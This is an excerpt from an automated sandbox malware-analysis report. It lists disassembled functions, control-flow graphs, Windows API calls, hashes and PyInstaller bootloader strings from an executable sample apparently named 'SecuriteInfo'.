                                                                                                                                                                                                                                    control_flow_graph 530 7ff7b2b61210-7ff7b2b6126d call 7ff7b2b6bd80 533 7ff7b2b61297-7ff7b2b612af call 7ff7b2b74f44 530->533 534 7ff7b2b6126f-7ff7b2b61296 call 7ff7b2b62710 530->534 539 7ff7b2b612d4-7ff7b2b612e4 call 7ff7b2b74f44 533->539 540 7ff7b2b612b1-7ff7b2b612cf call 7ff7b2b74f08 call 7ff7b2b62910 533->540 546 7ff7b2b61309-7ff7b2b6131b 539->546 547 7ff7b2b612e6-7ff7b2b61304 call 7ff7b2b74f08 call 7ff7b2b62910 539->547 552 7ff7b2b61439-7ff7b2b6146d call 7ff7b2b6ba60 call 7ff7b2b74f30 * 2 540->552 548 7ff7b2b61320-7ff7b2b61345 call 7ff7b2b7039c 546->548 547->552 558 7ff7b2b6134b-7ff7b2b61355 call 7ff7b2b70110 548->558 559 7ff7b2b61431 548->559 558->559 566 7ff7b2b6135b-7ff7b2b61367 558->566 559->552 568 7ff7b2b61370-7ff7b2b61398 call 7ff7b2b6a1c0 566->568 571 7ff7b2b6139a-7ff7b2b6139d 568->571 572 7ff7b2b61416-7ff7b2b6142c call 7ff7b2b62710 568->572 573 7ff7b2b6139f-7ff7b2b613a9 571->573 574 7ff7b2b61411 571->574 572->559 576 7ff7b2b613ab-7ff7b2b613b9 call 7ff7b2b70adc 573->576 577 7ff7b2b613d4-7ff7b2b613d7 573->577 574->572 583 7ff7b2b613be-7ff7b2b613c1 576->583 578 7ff7b2b613ea-7ff7b2b613ef 577->578 579 7ff7b2b613d9-7ff7b2b613e7 call 7ff7b2b89e30 577->579 578->568 582 7ff7b2b613f5-7ff7b2b613f8 578->582 579->578 585 7ff7b2b6140c-7ff7b2b6140f 582->585 586 7ff7b2b613fa-7ff7b2b613fd 582->586 587 7ff7b2b613c3-7ff7b2b613cd call 7ff7b2b70110 583->587 588 7ff7b2b613cf-7ff7b2b613d2 583->588 585->559 586->572 590 7ff7b2b613ff-7ff7b2b61407 586->590 587->578 587->588 588->572 590->548
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                    • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                    • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                    • Opcode ID: dd836ad82b15e2009d0bed87c4dd8fae95f83ed66c265d52f03f9f67774168e5
                                                                                                                                                                                                                                    • Instruction ID: 53144fe4709357f67e346b8ad92ddd747339be192bd9fb102a0e99d6239dbdf4
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dd836ad82b15e2009d0bed87c4dd8fae95f83ed66c265d52f03f9f67774168e5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E51C522A1A64241EA23BB1994403BBF290AF66794FC84135EF4D87BDDFEBCD441C714
                                                                                                                                                                                                                                    Function 00007FF7B2B636B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,00007FF7B2B63804), ref: 00007FF7B2B636E1
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF7B2B63804), ref: 00007FF7B2B636EB
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B62C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B2B63706,?,00007FF7B2B63804), ref: 00007FF7B2B62C9E
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B62C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B2B63706,?,00007FF7B2B63804), ref: 00007FF7B2B62D63
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B62C50: MessageBoxW.USER32 ref: 00007FF7B2B62D99
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                    • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                    • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                    • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                    • Instruction ID: 641b8400098f2f3acf4fcd732b4effddf6d016ed010af632c210c6f7a9a5f212
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5621B461B1A64240FA23BB28E8053B7E250BF66744FC44236D75DC65DDFEACE505C328
                                                                                                                                                                                                                                    Function 00007FF7B2B7BA5C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 691 7ff7b2b7ba5c-7ff7b2b7ba82 692 7ff7b2b7ba9d-7ff7b2b7baa1 691->692 693 7ff7b2b7ba84-7ff7b2b7ba98 call 7ff7b2b74ee8 call 7ff7b2b74f08 691->693 694 7ff7b2b7be77-7ff7b2b7be83 call 7ff7b2b74ee8 call 7ff7b2b74f08 692->694 695 7ff7b2b7baa7-7ff7b2b7baae 692->695 707 7ff7b2b7be8e 693->707 714 7ff7b2b7be89 call 7ff7b2b7a8e0 694->714 695->694 697 7ff7b2b7bab4-7ff7b2b7bae2 695->697 697->694 700 7ff7b2b7bae8-7ff7b2b7baef 697->700 703 7ff7b2b7bb08-7ff7b2b7bb0b 700->703 704 7ff7b2b7baf1-7ff7b2b7bb03 call 7ff7b2b74ee8 call 7ff7b2b74f08 700->704 710 7ff7b2b7be73-7ff7b2b7be75 703->710 711 7ff7b2b7bb11-7ff7b2b7bb17 703->711 704->714 712 7ff7b2b7be91-7ff7b2b7bea8 707->712 710->712 711->710 715 7ff7b2b7bb1d-7ff7b2b7bb20 711->715 714->707 715->704 718 7ff7b2b7bb22-7ff7b2b7bb47 715->718 720 7ff7b2b7bb7a-7ff7b2b7bb81 718->720 721 7ff7b2b7bb49-7ff7b2b7bb4b 718->721 722 7ff7b2b7bb56-7ff7b2b7bb6d call 7ff7b2b74ee8 call 7ff7b2b74f08 call 7ff7b2b7a8e0 720->722 723 7ff7b2b7bb83-7ff7b2b7bb8f call 7ff7b2b7d5fc 720->723 724 7ff7b2b7bb4d-7ff7b2b7bb54 721->724 725 7ff7b2b7bb72-7ff7b2b7bb78 721->725 753 7ff7b2b7bd00 722->753 732 7ff7b2b7bb94-7ff7b2b7bbab call 7ff7b2b7a948 * 2 723->732 724->722 724->725 727 7ff7b2b7bbf8-7ff7b2b7bc0f 725->727 730 7ff7b2b7bc8a-7ff7b2b7bc94 call 7ff7b2b8391c 727->730 731 7ff7b2b7bc11-7ff7b2b7bc19 727->731 742 7ff7b2b7bd1e 730->742 743 7ff7b2b7bc9a-7ff7b2b7bcaf 730->743 731->730 735 7ff7b2b7bc1b-7ff7b2b7bc1d 731->735 756 7ff7b2b7bbad-7ff7b2b7bbc3 call 7ff7b2b74f08 call 7ff7b2b74ee8 732->756 757 7ff7b2b7bbc8-7ff7b2b7bbf3 call 7ff7b2b7c284 732->757 735->730 739 7ff7b2b7bc1f-7ff7b2b7bc35 735->739 739->730 744 7ff7b2b7bc37-7ff7b2b7bc43 739->744 746 7ff7b2b7bd23-7ff7b2b7bd43 ReadFile 742->746 743->742 748 7ff7b2b7bcb1-7ff7b2b7bcc3 GetConsoleMode 743->748 744->730 749 7ff7b2b7bc45-7ff7b2b7bc47 744->749 751 7ff7b2b7be3d-7ff7b2b7be46 GetLastError 746->751 752 7ff7b2b7bd49-7ff7b2b7bd51 746->752 748->742 754 7ff7b2b7bcc5-7ff7b2b7bccd 748->754 749->730 755 7ff7b2b7bc49-7ff7b2b7bc61 749->755 762 7ff7b2b7be48-7ff7b2b7be5e call 7ff7b2b74f08 call 7ff7b2b74ee8 751->762 763 7ff7b2b7be63-7ff7b2b7be66 751->763 752->751 759 7ff7b2b7bd57 752->759 764 7ff7b2b7bd03-7ff7b2b7bd0d call 7ff7b2b7a948 753->764 754->746 761 7ff7b2b7bccf-7ff7b2b7bcf1 ReadConsoleW 754->761 755->730 765 7ff7b2b7bc63-7ff7b2b7bc6f 755->765 756->753 757->727 769 7ff7b2b7bd5e-7ff7b2b7bd73 759->769 771 7ff7b2b7bcf3 GetLastError 761->771 772 7ff7b2b7bd12-7ff7b2b7bd1c 761->772 762->753 766 7ff7b2b7be6c-7ff7b2b7be6e 763->766 767 7ff7b2b7bcf9-7ff7b2b7bcfb call 7ff7b2b74e7c 763->767 764->712 765->730 775 7ff7b2b7bc71-7ff7b2b7bc73 765->775 766->764 767->753 769->764 778 7ff7b2b7bd75-7ff7b2b7bd80 769->778 771->767 772->769 775->730 776 7ff7b2b7bc75-7ff7b2b7bc85 775->776 776->730 783 7ff7b2b7bda7-7ff7b2b7bdaf 778->783 784 7ff7b2b7bd82-7ff7b2b7bd9b call 7ff7b2b7b674 778->784 787 7ff7b2b7be2b-7ff7b2b7be38 call 7ff7b2b7b4b4 783->787 788 7ff7b2b7bdb1-7ff7b2b7bdc3 783->788 791 7ff7b2b7bda0-7ff7b2b7bda2 784->791 787->791 792 7ff7b2b7be1e-7ff7b2b7be26 788->792 793 7ff7b2b7bdc5 788->793 791->764 792->764 795 7ff7b2b7bdca-7ff7b2b7bdd1 793->795 796 7ff7b2b7be0d-7ff7b2b7be18 795->796 797 7ff7b2b7bdd3-7ff7b2b7bdd7 795->797 796->792 798 7ff7b2b7bdd9-7ff7b2b7bde0 797->798 799 7ff7b2b7bdf3 797->799 798->799 801 7ff7b2b7bde2-7ff7b2b7bde6 798->801 800 7ff7b2b7bdf9-7ff7b2b7be09 799->800 800->795 803 7ff7b2b7be0b 800->803 801->799 802 7ff7b2b7bde8-7ff7b2b7bdf1 801->802 802->800 803->792
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                    • Opcode ID: c3f57b6cd1f658b3a1cfdd45bc75f21d2f6c8be166295f0eb40444005b392bd6
                                                                                                                                                                                                                                    • Instruction ID: d02fc6633896ac90d382300f4ea824b33d28cd48348f4247507f146611441c55
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3f57b6cd1f658b3a1cfdd45bc75f21d2f6c8be166295f0eb40444005b392bd6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44C1D52290D68691E6627B1D90402BFF660EBA3B90FD54131EB4D077ADEEFCE445CB20
                                                                                                                                                                                                                                    Function 00007FF7B2B66360 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                    • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                    • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                    • Opcode ID: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
                                                                                                                                                                                                                                    • Instruction ID: 73ec254de23d850c5025af6fad3383a3b7f3c8320976cccf0b7bec119941a8e9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A941B321A1AA8691EA17EB28E4181EBE311FF66340FC00136DB5C8769DFFBCE515C360
                                                                                                                                                                                                                                    Function 00007FF7B2B75628 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1279662727-0
                                                                                                                                                                                                                                    • Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                    • Instruction ID: 7e6c219194974e72dfe7dbbba2802fcb42d3b7fc586f99c5f515b68bc7f8998a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8741C962D2978183E755BB28951077AB260FBA5364F504334EB6C07AE9EFBCE0E0C710
                                                                                                                                                                                                                                    Function 00007FF7B2B6CC3C Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3251591375-0
                                                                                                                                                                                                                                    • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                    • Instruction ID: f3af564981e2a41177daec342e254dde0884ead19144a8ac99e121f9f7041497
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF313B20E0B54345EA53BB6C94292BBE291AF63344FC44534D70D872AFFEECA404C278
                                                                                                                                                                                                                                    Function 00007FF7B2B79A30 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                                                                                    • Opcode ID: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                                    • Instruction ID: ec933251847c1a2f97decf4bb4c984be7df18d857975e7150ae40beb6b0f92de
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 21D09B10B1770542EB163B7C5C5947A52555F66701F94143CCA1F5A36FFDBCA449C320
                                                                                                                                                                                                                                    Function 00007FF7B2B7013C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                    • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                    • Instruction ID: a8d0da6fc7cc23490c35671d922f1718aa0cc2bb46e130e0b14c67255762ad9d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E851FF2170F24146EF66B92D540077BE191AF667A4F484A35DF6D077EDEEBCD440C620
                                                                                                                                                                                                                                    Function 00007FF7B2B7C134 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2976181284-0
                                                                                                                                                                                                                                    • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                    • Instruction ID: 4de386819421d88d66a667c305fdd340fcf208d6c4d4052a3c043b12b660e985
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C211B96160864141DA11AB2DA41416AB361AB66FF4F944335EF7D47BEDDEBCD051C700
                                                                                                                                                                                                                                    Function 00007FF7B2B7A948 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(?,?,?,00007FF7B2B82D22,?,?,?,00007FF7B2B82D5F,?,?,00000000,00007FF7B2B83225,?,?,?,00007FF7B2B83157), ref: 00007FF7B2B7A95E
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF7B2B82D22,?,?,?,00007FF7B2B82D5F,?,?,00000000,00007FF7B2B83225,?,?,?,00007FF7B2B83157), ref: 00007FF7B2B7A968
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 485612231-0
